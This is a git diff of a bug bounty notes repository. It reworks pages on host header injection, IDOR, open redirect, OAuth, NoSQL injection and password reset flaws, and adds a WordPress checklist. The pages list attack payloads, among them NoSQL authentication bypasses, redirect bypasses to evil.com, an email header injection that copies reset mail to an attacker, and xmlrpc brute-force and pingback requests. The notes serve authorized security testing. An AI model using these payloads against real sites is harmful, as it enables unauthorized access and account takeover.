5. Exposed Darcs folder
|
5. Exposed Darcs folder
|
||||||
```
|
```
|
||||||
http://target.com/_darcs
|
http://target.com/_darcs
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Tools to dump _darcs (Not found)
|
||||||
|
|
||||||
6. Exposed Bitkeeper folder
|
6. Exposed Bitkeeper folder
|
||||||
```
|
```
|
||||||
http://target.com/Bitkeeper
|
http://target.com/Bitkeeper
|
||||||
```
|
```
|
||||||
|
|
||||||
Reference:
|
Tools to dump BitKeeper (Not found)
|
||||||
- [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html)
|
|
||||||
|
## Reference
|
||||||
|
* [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html)
|
||||||
|
@ -1,3 +0,0 @@
|
|||||||
# Common bug in Zend framework
|
|
||||||
1. Exposed config files
|
|
||||||
* Full Path Exploit : http://target.com//application/configs/application.ini
|
|
@ -1,10 +1,9 @@
|
|||||||
# Host Header Injection
|
# Host Header Injection
|
||||||
|
|
||||||
## **Introduction**
|
## Introduction
|
||||||
HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks.
|
HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks.
|
||||||
|
|
||||||
## **How to Find**
|
## How to exploit
|
||||||
|
|
||||||
1. Change the host header
|
1. Change the host header
|
||||||
```
|
```
|
||||||
GET /index.php HTTP/1.1
|
GET /index.php HTTP/1.1
|
||||||
@ -47,5 +46,6 @@ GET https://vulnerable-website.com/ HTTP/1.1
|
|||||||
Host: evil-website.com
|
Host: evil-website.com
|
||||||
...
|
...
|
||||||
```
|
```
|
||||||
Reference:
|
|
||||||
- [PortSwigger](https://portswigger.net/web-security/host-header/exploiting)
|
## References
|
||||||
|
* [PortSwigger](https://portswigger.net/web-security/host-header/exploiting)
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
# Insecure Direct Object Reference (IDOR)
|
# Insecure Direct Object Reference (IDOR)
|
||||||
|
|
||||||
## **Introduction**
|
## Introduction
|
||||||
IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.
|
IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.
|
||||||
|
|
||||||
## **How to Find**
|
## How to FInd
|
||||||
1. Add parameters onto the endpoints for example, if there was
|
1. Add parameters onto the endpoints for example, if there was
|
||||||
```
|
```
|
||||||
GET /api/v1/getuser
|
GET /api/v1/getuser
|
||||||
@ -152,5 +152,5 @@ GET /api/users/*
|
|||||||
|
|
||||||
16. Try google dorking to find new endpoint
|
16. Try google dorking to find new endpoint
|
||||||
|
|
||||||
Reference:
|
## References
|
||||||
- [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup
|
* [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
# Account Takeover
|
# Account Takeover
|
||||||
|
|
||||||
## **Introduction**
|
## Introduction
|
||||||
Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else.
|
Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else.
|
||||||
|
|
||||||
## **How to Find**
|
## How to exploit
|
||||||
1. Using OAuth Misconfiguration
|
1. Using OAuth Misconfiguration
|
||||||
- Victim has a account in evil.com
|
- Victim has a account in evil.com
|
||||||
- Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
|
- Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
|
||||||
|
@ -1,16 +1,16 @@
|
|||||||
# Broken Link Hijacking
|
# Broken Link Hijacking
|
||||||
|
|
||||||
## Tools
|
## Introduction
|
||||||
- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
|
|
||||||
|
|
||||||
## Definition
|
|
||||||
Broken Link Hijacking exists whenever a target links to an expired domain or page
|
Broken Link Hijacking exists whenever a target links to an expired domain or page
|
||||||
|
|
||||||
## How to find
|
## How to find
|
||||||
1. Manually find external links on the target site (For example, check some links to social media accounts)
|
1. Manually find external links on the target site (For example, check some links to social media accounts)
|
||||||
2. Try using tools to find broken link, for example using tools that listed in this readme
|
2. Try using tools to find broken link, for example using tools that listed in this readme
|
||||||
|
|
||||||
References:
|
## Tools
|
||||||
- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
|
- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
|
||||||
|
|
||||||
- [How I was able to takeover the company’s LinkedIn Page](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d)
|
## References
|
||||||
|
- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
|
||||||
|
- [How I was able to takeover the company’s LinkedIn Page](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d)
|
||||||
|
- [Hackerone #1466889](https://hackerone.com/reports/1466889)
|
File diff suppressed because it is too large
Load Diff
@ -1,8 +1,9 @@
|
|||||||
# Email Spoofing
|
# Email Spoofing
|
||||||
|
|
||||||
## Introduction
|
## Introduction
|
||||||
Email spoofing is a technique used in spam and phishing attacks to trick users into thinking a message came from a person or entity they either know or can trust. In spoofing attacks, the sender forges email headers so that client software displays the fraudulent sender address, which most users take at face value.
|
Email spoofing is a technique used in spam and phishing attacks to trick users into thinking a message came from a person or entity they either know or can trust. In spoofing attacks, the sender forges email headers so that client software displays the fraudulent sender address, which most users take at face value.
|
||||||
|
|
||||||
## How to Find
|
## How to detect
|
||||||
1. Check the SPF records, if the website don't have a SPF record, the website must be vulnerable to email spoofing
|
1. Check the SPF records, if the website don't have a SPF record, the website must be vulnerable to email spoofing
|
||||||
```
|
```
|
||||||
v=spf1 include:_spf.google.com ~all
|
v=spf1 include:_spf.google.com ~all
|
||||||
|
@ -1,10 +1,15 @@
|
|||||||
# Exposed API Keys
|
# Exposed API Keys / Token OAuth
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
Sometimes in a web application, an attacker can find some exposed API keys / token which can lead to financial loss to a company.
|
||||||
|
|
||||||
|
## How to find
|
||||||
|
1. Find API keys / token by looking at the JavaScript code on the website
|
||||||
|
2. Find API keys / token by checking the request / response header
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
* [Key-Checker](https://github.com/daffainfo/Key-Checker)
|
* [Key-Checker](https://github.com/daffainfo/Key-Checker)
|
||||||
|
|
||||||
## Definition
|
# References
|
||||||
Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company.
|
* [keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys
|
||||||
|
* [all-about-apikey](https://github.com/daffainfo/all-about-apikey) is a repository of detailed information about API Key / Oauth tokens. The repository contain description API key, HTTP request, the response if the API key is valid / no, regex, and the example
|
||||||
## How to exploit
|
|
||||||
[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys
|
|
@ -1,8 +1,9 @@
|
|||||||
# JWT Vulnerabilities
|
# JWT Vulnerabilities
|
||||||
|
|
||||||
## Introduction
|
## Introduction
|
||||||
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object.
|
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object.
|
||||||
|
|
||||||
## How to Exploit
|
## How to exploit
|
||||||
1. Modify the algorithm to "none" algorithm
|
1. Modify the algorithm to "none" algorithm
|
||||||
```
|
```
|
||||||
{
|
{
|
||||||
@ -18,5 +19,8 @@ If you change the algorithm from RS256 to HS256, the backend code uses the publi
|
|||||||
|
|
||||||
the HS256 key strength is weak, it can be directly brute-forced, such as using the secret string as a key in the PyJWT library sample code.
|
the HS256 key strength is weak, it can be directly brute-forced, such as using the secret string as a key in the PyJWT library sample code.
|
||||||
|
|
||||||
Reference:
|
## Tools
|
||||||
|
* [jwt-hack](https://github.com/hahwul/jwt-hack)
|
||||||
|
|
||||||
|
## Reference
|
||||||
- [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
|
- [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
|
@ -1,8 +1,9 @@
|
|||||||
# Mass Assignment Attack
|
# Mass Assignment Attack
|
||||||
|
|
||||||
## Introduction
|
## Introduction
|
||||||
Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS
|
Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS
|
||||||
|
|
||||||
## How to Exploit
|
## How to exploit
|
||||||
- Normal request
|
- Normal request
|
||||||
```
|
```
|
||||||
POST /editdata
|
POST /editdata
|
||||||
@ -30,4 +31,7 @@ HTTP/1.1 200 OK
|
|||||||
...
|
...
|
||||||
|
|
||||||
username=daffa&admin=true
|
username=daffa&admin=true
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
* [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)
|
@ -1,5 +1,9 @@
|
|||||||
## Password Reset Flaws
|
## Password Reset Flaws
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
Common security flaws in password reset functionality
|
||||||
|
|
||||||
|
## How to exploit
|
||||||
1. Parameter pollution in reset password
|
1. Parameter pollution in reset password
|
||||||
```
|
```
|
||||||
POST /reset
|
POST /reset
|
||||||
@ -77,7 +81,7 @@ email=victim@mail.com%0a%0dcc:hacker@mail.com
|
|||||||
```
|
```
|
||||||
POST /newaccount
|
POST /newaccount
|
||||||
[...]
|
[...]
|
||||||
{“email”:“victim@mail.com”,”hacker@mail.com”,“token”:”xxxxxxxxxx”}
|
{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"}
|
||||||
```
|
```
|
||||||
|
|
||||||
9. Find out how the tokens generate
|
9. Find out how the tokens generate
|
||||||
@ -85,4 +89,7 @@ POST /newaccount
|
|||||||
- Generated based on the ID of the user
|
- Generated based on the ID of the user
|
||||||
- Generated based on the email of the user
|
- Generated based on the email of the user
|
||||||
- Generated based on the name of the user
|
- Generated based on the name of the user
|
||||||
> [For Example](https://medium.com/bugbountywriteup/how-i-discovered-an-interesting-account-takeover-flaw-18a7fb1e5359)
|
|
||||||
|
## References
|
||||||
|
* [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
|
||||||
|
* [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414)
|
@ -1,8 +1,9 @@
|
|||||||
# Tabnabbing
|
# Tabnabbing
|
||||||
|
|
||||||
## Introduction
|
## Introduction
|
||||||
When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.
|
When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.
|
||||||
|
|
||||||
## How to Find
|
## How to find
|
||||||
```html
|
```html
|
||||||
<a href="..." target="_blank" rel="" />
|
<a href="..." target="_blank" rel="" />
|
||||||
|
|
||||||
@ -20,4 +21,7 @@ When you open a link in a new tab ( target="_blank" ), the page that opens in a
|
|||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
|
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
|
||||||
3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
|
3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
|
||||||
|
|
||||||
|
## References
|
||||||
|
* [Hackerone #260278](https://hackerone.com/reports/260278)
|
@ -1,11 +1,9 @@
|
|||||||
## NoSQL injection
|
## NoSQL injection
|
||||||
|
|
||||||
## Tools
|
## Introduction
|
||||||
|
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
|
||||||
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
|
|
||||||
|
|
||||||
## Exploit
|
|
||||||
|
|
||||||
|
## How to Exploit
|
||||||
### Authentication Bypass
|
### Authentication Bypass
|
||||||
|
|
||||||
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||||
@ -137,7 +135,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
|||||||
[$ne]=1
|
[$ne]=1
|
||||||
```
|
```
|
||||||
|
|
||||||
## References
|
## Tools
|
||||||
|
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
|
||||||
|
|
||||||
|
## References
|
||||||
* [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection)
|
* [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection)
|
||||||
* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md)
|
* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md)
|
@ -1,16 +1,22 @@
|
|||||||
# OAuth Misconfiguration
|
# OAuth Misconfiguration
|
||||||
1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses).
|
|
||||||
2. Change Referral header to attacker(.)com while requesting OAuth.
|
## Introduction
|
||||||
3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials.
|
The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account.
|
||||||
|
|
||||||
|
## How to find
|
||||||
|
1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses).
|
||||||
|
2. Change Referral header to attacker.com while requesting OAuth.
|
||||||
|
3. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials.
|
||||||
4. OAuth Token Re-use.
|
4. OAuth Token Re-use.
|
||||||
5. Missing or broken state parameter.
|
5. Missing or broken state parameter.
|
||||||
6. Lack of origin check.
|
6. Lack of origin check.
|
||||||
7. Open Redirection on another endpoint > Use it in redirect_uri
|
7. Open Redirection on another endpoint > Use it in redirect_uri
|
||||||
8. If there is an email parameter after signin then try to change the email parameter to victim's one.
|
8. If there is an email parameter after signin then try to change the email parameter to victim's one.
|
||||||
9. Try to remove email from the scope and add victim's email manually.
|
9. Try to remove email from the scope and add victim's email manually.
|
||||||
10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com
|
10. Only company's email is allowed? > Try to replace hd=company.com to hd=gmail.com
|
||||||
11. Check if its leaking client_secret parameter.
|
11. Check if its leaking client_secret parameter.
|
||||||
12. Go to the browser history and check if the token is there.
|
12. Go to the browser history and check if the token is there.
|
||||||
|
|
||||||
Reference:
|
## References
|
||||||
- https://twitter.com/tuhin1729_/status/1417843523177484292
|
* [tuhin1729_](https://twitter.com/tuhin1729_/status/1417843523177484292)
|
||||||
|
* [c0d3x27](https://infosecwriteups.com/the-oauth-misconfiguration-15e66dd19a6e)
|
@ -1,5 +1,9 @@
|
|||||||
## Open Redirect
|
## Open Redirect
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain
|
||||||
|
|
||||||
|
## How to Find
|
||||||
1. Try change the domain
|
1. Try change the domain
|
||||||
```
|
```
|
||||||
/?redir=evil.com
|
/?redir=evil.com
|
||||||
@ -87,4 +91,8 @@ http://ⓔⓥⓘⓛ.ⓒⓞⓜ
|
|||||||
17. Bypass the filter if it only allows yoou to control the path using a nullbyte `%0d` or `%0a`
|
17. Bypass the filter if it only allows yoou to control the path using a nullbyte `%0d` or `%0a`
|
||||||
```
|
```
|
||||||
/?redir=/%0d/evil.com
|
/?redir=/%0d/evil.com
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
* [Hackerone #1250758](https://hackerone.com/reports/1250758)
|
||||||
|
* [@ahmadbrainworks](https://medium.com/@ahmadbrainworks/bug-bounty-how-i-earned-550-in-less-than-5-minutes-open-redirect-chained-with-rxss-8957979070e5)
|
13
README.md
13
README.md
@ -7,6 +7,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty)
|
![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty)
|
||||||
|
|
||||||
## List
|
## List
|
||||||
|
- [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md)
|
||||||
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
|
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
|
||||||
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
|
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
|
||||||
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
|
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
|
||||||
@ -27,14 +28,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
|
- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
|
||||||
- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
|
- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
|
||||||
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
||||||
- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
|
- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
|
||||||
|
|
||||||
## List CMS
|
|
||||||
- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md)
|
|
||||||
|
|
||||||
## List Framework
|
|
||||||
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
|
|
||||||
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md)
|
|
||||||
|
|
||||||
## Miscellaneous
|
## Miscellaneous
|
||||||
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
||||||
@ -52,7 +46,10 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
||||||
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
||||||
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
||||||
|
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md)
|
||||||
- [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
|
- [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
|
||||||
|
- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md)
|
||||||
|
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md)
|
||||||
|
|
||||||
## Reconnaissance
|
## Reconnaissance
|
||||||
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
||||||
|
@ -11,6 +11,7 @@ Only Specific URLs are part of Scope. This usually includes staging/dev/testing
|
|||||||
- [x] Broken Link Hijacking
|
- [x] Broken Link Hijacking
|
||||||
- [x] Data Breach Analysis
|
- [x] Data Breach Analysis
|
||||||
- [x] Misconfigured Cloud Storage
|
- [x] Misconfigured Cloud Storage
|
||||||
|
|
||||||
* ### __Medium Scope__
|
* ### __Medium Scope__
|
||||||
Usually the scope is wild card scope where all the subdomains are part of scope
|
Usually the scope is wild card scope where all the subdomains are part of scope
|
||||||
- [x] Subdomain Enumeration
|
- [x] Subdomain Enumeration
|
||||||
@ -33,6 +34,7 @@ Usually the scope is wild card scope where all the subdomains are part of scope
|
|||||||
- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
|
- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
|
||||||
- [x] Heartbleed Scanning
|
- [x] Heartbleed Scanning
|
||||||
- [x] General Security Misconfiguration Scanning
|
- [x] General Security Misconfiguration Scanning
|
||||||
|
|
||||||
* ### __Large Scope__
|
* ### __Large Scope__
|
||||||
Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
|
Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
|
||||||
- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.)
|
- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.)
|
||||||
|
@ -549,7 +549,7 @@ http.title:"- Polycom" "Server: lighttpd"
|
|||||||
### Intel Active Management CVE-2017-5689
|
### Intel Active Management CVE-2017-5689
|
||||||
```
|
```
|
||||||
"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995
|
"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995
|
||||||
”Active Management Technology”
|
"Active Management Technology"
|
||||||
```
|
```
|
||||||
|
|
||||||
### HP iLO 4 CVE-2017-12542
|
### HP iLO 4 CVE-2017-12542
|
||||||
|
@ -1,11 +1,11 @@
|
|||||||
# Moodle
|
# Moodle
|
||||||
|
|
||||||
1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
|
1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter
|
||||||
```
|
```
|
||||||
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
|
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
|
||||||
```
|
```
|
||||||
|
|
||||||
2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter
|
2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter
|
||||||
|
|
||||||
```
|
```
|
||||||
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
|
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
|
||||||
|
101
Technologies/WordPress.md
Normal file
101
Technologies/WordPress.md
Normal file
@ -0,0 +1,101 @@
|
|||||||
|
# WordPress Common Bugs
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
What would you do if you came across a website that uses WordPress?
|
||||||
|
|
||||||
|
1. Find the related CVE by checking the core, plugins, and theme version
|
||||||
|
* How to find the wordpress version
|
||||||
|
```
|
||||||
|
https://target.com/feed
|
||||||
|
https://target.com/?feed=rss2
|
||||||
|
```
|
||||||
|
|
||||||
|
* How to find the plugin version
|
||||||
|
```
|
||||||
|
https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
|
||||||
|
https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT
|
||||||
|
https://target.com/wp-content/plugins/PLUGINNAME/README.txt
|
||||||
|
https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
|
||||||
|
```
|
||||||
|
|
||||||
|
> or change readme.txt to changelog.txt or readme.md
|
||||||
|
|
||||||
|
* How to find the theme version
|
||||||
|
```
|
||||||
|
https://target.com/wp-content/themes/THEMENAME/style.css
|
||||||
|
https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)
|
||||||
|
```
|
||||||
|
If you found outdated core / plugins / themes, find the exploit at https://wpscan.com
|
||||||
|
|
||||||
|
2. Finding log files
|
||||||
|
```
|
||||||
|
http://target.com/wp-content/debug.log
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Finding backup file wp-config
|
||||||
|
```
|
||||||
|
http://target.com/.wp-config.php.swp
|
||||||
|
http://target.com/wp-config.inc
|
||||||
|
http://target.com/wp-config.old
|
||||||
|
http://target.com/wp-config.txt
|
||||||
|
http://target.com/wp-config.html
|
||||||
|
http://target.com/wp-config.php.bak
|
||||||
|
http://target.com/wp-config.php.dist
|
||||||
|
http://target.com/wp-config.php.inc
|
||||||
|
http://target.com/wp-config.php.old
|
||||||
|
http://target.com/wp-config.php.save
|
||||||
|
http://target.com/wp-config.php.swp
|
||||||
|
http://target.com/wp-config.php.txt
|
||||||
|
http://target.com/wp-config.php.zip
|
||||||
|
http://target.com/wp-config.php.html
|
||||||
|
http://target.com/wp-config.php~
|
||||||
|
```
|
||||||
|
|
||||||
|
4. Get the username on the website
|
||||||
|
```
|
||||||
|
http://target.com/?author=1
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```
|
||||||
|
http://target.com/wp-json/wp/v2/users
|
||||||
|
http://target.com/?rest_route=/wp/v2/users
|
||||||
|
```
|
||||||
|
|
||||||
|
5. Bruteforce
|
||||||
|
```
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
|
||||||
|
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```
|
||||||
|
POST /xmlrpc.php HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<methodCall>
|
||||||
|
<methodName>wp.getUsersBlogs</methodName>
|
||||||
|
<params>
|
||||||
|
<param><value>admin</value></param>
|
||||||
|
<param><value>BRUTEFORCE_IN_HERE</value></param>
|
||||||
|
</params>
|
||||||
|
</methodCall>
|
||||||
|
```
|
||||||
|
|
||||||
|
6. XSPA in wordpress
|
||||||
|
```
|
||||||
|
POST /xmlrpc.php HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
|
||||||
|
<methodCall>
|
||||||
|
<methodName>pingback.ping</methodName>
|
||||||
|
<params><param>
|
||||||
|
<value><string>http://yourip:port</string></value>
|
||||||
|
</param><param>
|
||||||
|
<value>
|
||||||
|
<string>https://target.com></string>
|
||||||
|
</value>
|
||||||
|
</param></params>
|
||||||
|
</methodCall>
|
||||||
|
```
|
13
Technologies/Zend.md
Normal file
13
Technologies/Zend.md
Normal file
@ -0,0 +1,13 @@
|
|||||||
|
# Common bug in Zend framework
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
What would you do if you came across a website that uses Zend?
|
||||||
|
|
||||||
|
## How to Detect
|
||||||
|
|
||||||
|
|
||||||
|
1. Finding config files
|
||||||
|
```
|
||||||
|
https://target.com/application/configs/application.ini
|
||||||
|
https://target.com/admin/configs/application.ini
|
||||||
|
```
|
@ -1,8 +1,9 @@
|
|||||||
# Web Cache Poisoning
|
# Web Cache Poisoning
|
||||||
## **Introduction**
|
|
||||||
|
## Introduction
|
||||||
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
|
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
|
||||||
|
|
||||||
## **How to Find**
|
## How to FInd
|
||||||
1. Basic poisoning
|
1. Basic poisoning
|
||||||
```
|
```
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
@ -29,6 +30,7 @@ Cache-Control: public, no-cache
|
|||||||
…
|
…
|
||||||
